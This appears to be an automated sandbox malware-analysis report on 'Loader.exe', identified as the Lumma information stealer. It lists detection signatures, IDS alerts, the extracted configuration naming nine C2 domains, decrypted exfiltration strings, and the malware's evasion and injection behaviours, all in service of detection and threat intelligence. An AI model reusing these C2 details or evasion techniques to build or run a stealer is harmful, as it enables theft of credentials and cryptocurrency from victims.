Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1532242
MD5:	cb50acc9b951b52306b95eaf8d4e2048
SHA1:	fd087d7b18d9dd37cb68f811f72de6c0dbbbfd31
SHA256:	16fd5c981d6da5cbd47293b35b0dd26c756493fe3f88d5613810a2f9b5159b39
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain checking for user administrative privileges

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Loader.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)

Loader.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)

Loader.exe (PID: 5200 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)

WerFault.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["condifendteu.sbs", "resinedyw.sbs", "drawwyobstacw.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "widdensmoywi.sbs"], "Build id": "HpOoIh--@qjwo1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:03.754512+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49710	104.21.8.37	443	TCP
2024-10-12T22:36:04.696511+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-12T22:36:05.691027+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49715	104.21.33.249	443	TCP
2024-10-12T22:36:06.659354+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49718	172.67.205.156	443	TCP
2024-10-12T22:36:07.640105+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49720	172.67.140.193	443	TCP
2024-10-12T22:36:08.737000+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49721	172.67.173.224	443	TCP
2024-10-12T22:36:09.687676+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49732	104.21.79.35	443	TCP
2024-10-12T22:36:10.665845+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49738	188.114.96.3	443	TCP
2024-10-12T22:36:12.787291+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49755	172.67.206.204	443	TCP
2024-10-12T22:36:13.768308+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49761	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:03.754512+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49710	104.21.8.37	443	TCP
2024-10-12T22:36:04.696511+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-12T22:36:05.691027+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49715	104.21.33.249	443	TCP
2024-10-12T22:36:06.659354+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49718	172.67.205.156	443	TCP
2024-10-12T22:36:07.640105+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49720	172.67.140.193	443	TCP
2024-10-12T22:36:08.737000+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49721	172.67.173.224	443	TCP
2024-10-12T22:36:09.687676+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49732	104.21.79.35	443	TCP
2024-10-12T22:36:10.665845+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49738	188.114.96.3	443	TCP
2024-10-12T22:36:12.787291+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49755	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:13.768308+0200	2049812	1	A Network Trojan was detected	192.168.2.6	49761	172.67.206.204	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:09.254568+0200	2056559	1	Domain Observed Used for C2 Detected	192.168.2.6	49732	104.21.79.35	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:10.181687+0200	2056557	1	Domain Observed Used for C2 Detected	192.168.2.6	49738	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:08.298990+0200	2056561	1	Domain Observed Used for C2 Detected	192.168.2.6	49721	172.67.173.224	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:05.271502+0200	2056567	1	Domain Observed Used for C2 Detected	192.168.2.6	49715	104.21.33.249	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:04.269367+0200	2056571	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:06.214986+0200	2056565	1	Domain Observed Used for C2 Detected	192.168.2.6	49718	172.67.205.156	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:07.184611+0200	2056563	1	Domain Observed Used for C2 Detected	192.168.2.6	49720	172.67.140.193	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (widdensmoywi .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:03.254074+0200	2056573	1	Domain Observed Used for C2 Detected	192.168.2.6	49710	104.21.8.37	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:04.698408+0200	2056568	1	Domain Observed Used for C2 Detected	192.168.2.6	53786	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:08.748838+0200	2056558	1	Domain Observed Used for C2 Detected	192.168.2.6	58354	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:09.689166+0200	2056556	1	Domain Observed Used for C2 Detected	192.168.2.6	50135	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:07.803851+0200	2056560	1	Domain Observed Used for C2 Detected	192.168.2.6	63149	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:04.758725+0200	2056566	1	Domain Observed Used for C2 Detected	192.168.2.6	50381	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:03.762048+0200	2056570	1	Domain Observed Used for C2 Detected	192.168.2.6	64493	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:05.716570+0200	2056564	1	Domain Observed Used for C2 Detected	192.168.2.6	50222	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:06.687782+0200	2056562	1	Domain Observed Used for C2 Detected	192.168.2.6	51843	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (widdensmoywi .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:02.740997+0200	2056572	1	Domain Observed Used for C2 Detected	192.168.2.6	55988	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T22:36:12.025576+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.6	49744	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Loader.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: 3.2.Loader.exe.400000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["condifendteu.sbs", "resinedyw.sbs", "drawwyobstacw.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "widdensmoywi.sbs"], "Build id": "HpOoIh--@qjwo1"}

Multi AV Scanner detection for domain / URL

Source: vennurviot.sbs	Virustotal: Detection: 16%			Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for submitted file

Source: Loader.exe	ReversingLabs: Detection: 42%
Source: Loader.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: condifendteu.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vennurviot.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: resinedyw.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: enlargkiw.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: allocatinow.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: mathcucom.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: widdensmoywi.sbs
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: HpOoIh--@qjwo1

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.8.37:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49761 version: TLS 1.2

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_001A9DAA FindFirstFileExW,		0_2_001A9DAA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 2_2_001A9DAA FindFirstFileExW,		2_2_001A9DAA

Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_001EE020
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, dword ptr [esp+38h]	0_2_001E8070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	0_2_001DC080
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push 2CCA4B49h	0_2_001CC144
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]	0_2_001F02BA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h	0_2_002042E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	0_2_001EA3A5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	0_2_001DC3E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h	0_2_001FE4F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_001EE56A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	0_2_001FE650
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	0_2_001DC673
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, ecx	0_2_001CE672
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_001DE6E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	0_2_001CE7A8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push esi	0_2_001EA813
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	0_2_001F0892
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	0_2_001F0892
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h	0_2_001FE9A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	0_2_001EC9F2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_001C4A90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp dword ptr [0044EF6Ch]	0_2_001EAAD8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h	0_2_00204B30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	0_2_001EAB28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]	0_2_001FABBD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]	0_2_001FEBC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh	0_2_001FEBC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	0_2_001FCD00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]	0_2_001CAD60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh	0_2_001DCE13
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	0_2_001DCE13
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	0_2_001DCE13
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh	0_2_00204E00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	0_2_00204E00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then lea eax, dword ptr [esp+48h]	0_2_001E8E5D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov esi, dword ptr [esp+18h]	0_2_001BEF00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]	0_2_001CCFC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	0_2_00200FD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h	0_2_001FEFE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]	0_2_001FEFE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_001ED1F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_001E31E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, ebx	0_2_001E31E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-17h]	0_2_001E31E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_001E5250
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	0_2_001E9400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h	0_2_001E9400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]	0_2_001EB430
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	0_2_001E7490
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_001C35F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	0_2_002017E4
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h]	0_2_001CB7C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]	0_2_001CB7C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]	0_2_001E97F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_001F77F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_001ED800
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	0_2_001CD843
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]	0_2_002018B5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, ebx	0_2_001CD8F6
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h	0_2_001DFA3E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	0_2_00203B77
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	0_2_00203EC4
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	0_2_001EBF45
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then lea edi, dword ptr [esp+04h]	0_2_001EBF45
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_001EBFD7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_001DFFF7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp edi	0_2_00201FD2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	3_2_004438E4
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]	3_2_004439B5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]	3_2_0043CCC5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp edi	3_2_00443D4F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]	3_2_0040CE60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	3_2_0042E049
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then lea edi, dword ptr [esp+04h]	3_2_0042E049
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov esi, dword ptr [esp+18h]	3_2_00401000
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]	3_2_0040F0C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	3_2_004430D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042E0D7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h	3_2_004410E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]	3_2_004410E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]	3_2_004320A3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], dl	3_2_00430120
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00430120
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_0041E180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push 2CCA4B49h	3_2_0040E244
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], dx	3_2_004252E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, ebx	3_2_004252E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-17h]	3_2_004252E2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0042C2EE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042F2F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_004452A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_004452A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	3_2_00427350
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00429370
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, dword ptr [esp+38h]	3_2_00429370
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h	3_2_004463E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	3_2_004453F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_004453F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	3_2_0041E4E0
